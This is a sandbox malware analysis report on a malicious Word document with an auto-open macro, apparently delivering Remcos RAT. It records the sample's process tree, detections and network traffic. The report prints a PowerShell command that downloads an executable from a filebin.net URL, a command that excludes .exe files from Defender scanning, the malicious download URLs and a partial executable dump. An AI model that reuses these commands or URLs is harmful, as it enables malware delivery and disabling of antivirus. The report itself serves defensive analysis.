Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
12543_0008858249_FWDOUTSTANDING_20200604.doc

Overview

General Information

Sample Name:12543_0008858249_FWDOUTSTANDING_20200604.doc
Analysis ID:611840
MD5:090e1dfdcbf2185788ea14cd113cc39f
SHA1:6346e143368edbb5a23c8eea9698be2c266311b3
SHA256:3bd5892cdc82dc4576eaf2735edb57182ae8b91c8067be305d4e801197d390cc
Tags:docRemcosRAT
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Document contains OLE streams with names of living off the land binaries
Machine Learning detection for sample
Document contains OLE streams with PE executables
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Sigma detected: Cabinet File Expansion
Potential document exploit detected (performs DNS queries)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses cacls to modify the permissions of files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Sigma detected: Msiexec Initiated Connection
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Uses Microsoft's Enhanced Cryptographic Provider
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3036 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • msiexec.exe (PID: 2996 cmdline: C:\Windows\system32\msiexec.exe /V MD5: AC2E7152124CEED36846BD1B6592A00F)
    • msiexec.exe (PID: 464 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96 MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
      • icacls.exe (PID: 1436 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
      • expand.exe (PID: 1156 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 659CED6D7BDA047BCC6048384231DB9F)
      • TRY.exe (PID: 2272 cmdline: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" MD5: 96DF7B0C491646EFC2E5F2E9F0443B8B)
        • cmd.exe (PID: 1136 cmdline: cmd /c thai.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • powershell.exe (PID: 1988 cmdline: powershell -command "Set-MpPreference -ExclusionExtension ".exe" MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • powershell.exe (PID: 2672 cmdline: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe" MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • icacls.exe (PID: 2068 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
  • rundll32.exe (PID: 2840 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
12543_0008858249_FWDOUTSTANDING_20200604.docSUSP_Doc_WindowsInstaller_Call_Feb22_1Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.Nils Kuhnert
  • 0xe039:$: WindowsInstaller.Installer$
  • 0xec0b:$: CreateObject
  • 0xec36:$: InstallProduct
12543_0008858249_FWDOUTSTANDING_20200604.docOffice_AutoOpen_MacroDetects an Microsoft Office file that contains the AutoOpen Macro functionFlorian Roth
  • 0xe1f3:$s1: AutoOpen
  • 0xebee:$s1: AutoOpen
  • 0xd500:$s2: Macros

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmpSUSP_Doc_WindowsInstaller_Call_Feb22_1Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.Nils Kuhnert
  • 0x1039:$: WindowsInstaller.Installer$
  • 0x1f0b:$: CreateObject
  • 0x1f36:$: InstallProduct
C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMPSUSP_Doc_WindowsInstaller_Call_Feb22_1Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.Nils Kuhnert
  • 0x24a5:$: WindowsInstaller.Installer$
  • 0x23c6:$: CreateObject
  • 0x4b64:$: CreateObject
  • 0x4ce0:$: CreateObject
  • 0x4d1e:$: CreateObject
  • 0x5743:$: CreateObject
  • 0x4d54:$: InstallProduct
C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMPSUSP_VBA_FileSystem_AccessDetects suspicious VBA that writes to disk and is activated on document openFlorian Roth
  • 0x3648:$s1: \Common Files\Microsoft Shared\
  • 0x2111:$s2: Scripting.FileSystemObject
  • 0x2470:$a3: AutoOpen
  • 0x4b36:$a3: AutoOpen
  • 0x4d30:$a3: AutoOpen
  • 0x5766:$a3: AutoOpen

Sigma Signatures

There are no malicious signatures, click here to show all signatures.

Source: Process startedAuthor: Bhabesh Raj: Data: Command: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, CommandLine: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\expand.exe, NewProcessName: C:\Windows\SysWOW64\expand.exe, OriginalFileName: C:\Windows\SysWOW64\expand.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 464, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, ProcessId: 1156, ProcessName: expand.exe
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.47.40.36, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 2996, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", CommandLine: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c thai.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", ProcessId: 2672, ProcessName: powershell.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, ProcessId: 2272, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command "Set-MpPreference -ExclusionExtension ".exe", CommandLine: powershell -command "Set-MpPreference -ExclusionExtension ".exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c thai.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Set-MpPreference -ExclusionExtension ".exe", ProcessId: 1988, ProcessName: powershell.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 464, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" , ProcessId: 2272, ProcessName: TRY.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docVirustotal: Detection: 37%Perma Link
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docReversingLabs: Detection: 24%
Antivirus detection for URL or domain
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msiAvira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.exeAvira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: filebin.netVirustotal: Detection: 5%Perma Link
Machine Learning detection for sample
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB62E28 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,GetLastError,SetCurrentDirectoryA,9_2_000000013FB62E28
Source: unknownHTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknownHTTPS traffic detected: 87.238.33.8:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Windows\Logs\DPX\setupact.logJump to behavior
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Windows\Logs\DPX\setuperr.logJump to behavior
Source: Binary string: wextract.pdb source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: wextract.pdbGCTL source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: MSI5B5A.tmp.2.dr, MSI9F1.tmp.2.dr
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61F00 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,9_2_000000013FB61F00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: global trafficDNS query: name: filebin.net
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.47.40.36:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.47.40.36:443
Source: Joe Sandbox ViewASN Name: REDPILL-LINPRORedpillLinproNO REDPILL-LINPRORedpillLinproNO
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox ViewIP Address: 87.238.33.8 87.238.33.8
Source: Joe Sandbox ViewIP Address: 185.47.40.36 185.47.40.36
Source: unknownHTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknownHTTPS traffic detected: 87.238.33.8:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
Source: ~DFECA159C20646BB57.TMP.2.drString found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/
Source: expand.exe, 00000007.00000003.919683562.00000000003CF000.00000004.00000800.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927628947.0000000001E20000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927698970.0000000002020000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000000.925076387.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945747952.0000000000286000.00000004.00000020.00020000.00000000.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, thai.bat.9.dr, MSI5B5A.tmp.2.dr, files.cab.4.drString found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.exe
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.drString found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi
Source: ~DFECA159C20646BB57.TMP.2.drString found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470
Source: 535fae.ipi.2.drString found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{02CF5D71-875F-4179-8CDC-9768D4E5C0E6}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: filebin.net
Source: global trafficHTTP traffic detected: GET /rf43v6qzghbj7h7b/TRY.msi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: filebin.net
Source: global trafficHTTP traffic detected: GET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T071855Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=88f98aff597656b73ffa540a69b51975c1f37753b3a866ffe3810b4a5c372fd1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: situla.bitbit.net

System Summary

barindex
Document contains OLE streams with names of living off the land binaries
Source: MSI5B5A.tmp.2.drStream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : MSCF....l^......,...............}?..D........^.........T.. .TRY.exe..`.(....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d......&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................................................E3.H.B.A.....A.W...I;.E.G.E..xGH..t"L+.L+.I...H..t.A.....t...H..H...u.H..H.A.H.E.H..E..A..A..z........H..t....A.........E3.L..M..H..A.W...I.B.H=....E.G.E..x5I..H..M..t..8.t.H..H...u.H..H..E..A..E#.H..t.M..L+...E3.E..xXI..I...I+.t.H..M......I+.L..L+.M..t.A.....t...I..H..H...u.H..H.B.H.E.H..E..A..A..z......A.........L.D$.L.L$ SVWH.. 3.H.B.H=....H...W....G...x5H.Z.H..H..L.L$X3.........x.H.H;.w.u.@.<3..@.<3.z.....H..t......H.. _^[..........H.\$.H.l$.VWAVH......H..,...H3.H.D$pL..f.D$l..3.H.........l$h......H..H........H......H....1...H..H..taH.D$`A..H.D$PD.E .l$HH.L$h.l$@.}..l$8A. ....l$0...l$(.l$ ...~....t.H.T$`M..3.H........H.L$`...~..H..........H.L$pH3...i..L..$....I.[(I.k0I..A^_^.........H..H.X.H.p.H.x.L.p UH.h.H......H.."...H3.H.EG..Y...E3.D.u?f.EC..D.u'A.^.;...P...H.M'.........&.........H..L.E/.S....~......!...H.M/H.E+E3.H.D$ E3......}.............~....z.......U+3...<...H..H........D.M+H.E+H.M/L....H.D$ ..t}..........H.E7A. ...H.D$PH.M?D.t$HA. ...D.t$@..D.t$8D.t$0D.t$(D.t$ ..u}....t@A..D97v......H.U7..H..H.L....`}....u...;7r.....*....]'H.M7...}..H....(~..H.M/...}...E'..............E'...E.......H.MGH3...g..L..$....I.[.I.s.I.{ M.s(I..]........H.\$.WH..0...H..d...H3.H..$ ...I..I..H........t!...u.I......I...w.H....U....P3..Q..q...H..H...F4..H..w...L.D$ A......D$ .........L.D$ .?...H....$.................H..$ ...H3...f..H..$H...H..0..._..........H.\$.H.l$.H.t$.WH.. H..H..H..3...@8+tiH.....H...\_..H..u....H..H...I_..H..u.H...?.t.H..H........,_..H..t.Hc.H...8.t....H..H.\$0H.l$8H.t$@H.. _.3............H.\$.UVWATAUAVAWH..$....H..p...H......H3.H..`...L..H.EPM..H.MPL+.M..E3.M.......H......H..t.A.....t...H..H...u.H..H.A.H.E.D.(.}P"u.H......H.EQ..H......H.EPH.L$0H.D$0.....H.|$0H...H..H..tlH..H..D8,.u.H...rZ.G..\<:u.8O.t.8.uH:.uDH.D$@L..L+.H.L$@.....H......H..t.A.....t...H..H...u.H..H.A.H.E.D.(.ZA.....L......H.D$@A..L+.H.L$@H......H..t.A.....t...H..H...u.H..H.A.L..A..H.E.H
Document contains OLE streams with PE executables
Source: MSI5B5A.tmp.2.drStream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : MZ signature found
Source: MSI5B5A.tmp.2.drStream path '\x17163\x16689\x18229\x16766\x18365\x17932\x17910\x17458\x16778\x17207\x17522\x17357\x18479' : MZ signature found
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc, type: SAMPLEMatched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc, type: SAMPLEMatched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects an Microsoft Office file that contains the AutoOpen Macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp, type: DROPPEDMatched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, type: DROPPEDMatched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, type: DROPPEDMatched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\535fae.ipiJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB629E4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,9_2_000000013FB629E4
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61B44 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,9_2_000000013FB61B44
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5B5A.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB665B09_2_000000013FB665B0
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB63E4C9_2_000000013FB63E4C
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61C389_2_000000013FB61C38
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB659409_2_000000013FB65940
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB660289_2_000000013FB66028
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB633C09_2_000000013FB633C0
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61B449_2_000000013FB61B44
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB62B249_2_000000013FB62B24
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docOLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpenName: AutoOpen
Source: ~DFC2FF7A9553E7F48E.TMP.0.drOLE, VBA macro line: Sub AutoOpen()
Source: 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 289 bytes, 1 file
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFC2FF7A9553E7F48E.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: MSI5B5A.tmp.2.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 535fae.ipi.2.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docOLE indicator, VBA macros: true
Source: ~DFC2FF7A9553E7F48E.TMP.0.drOLE indicator, VBA macros: true
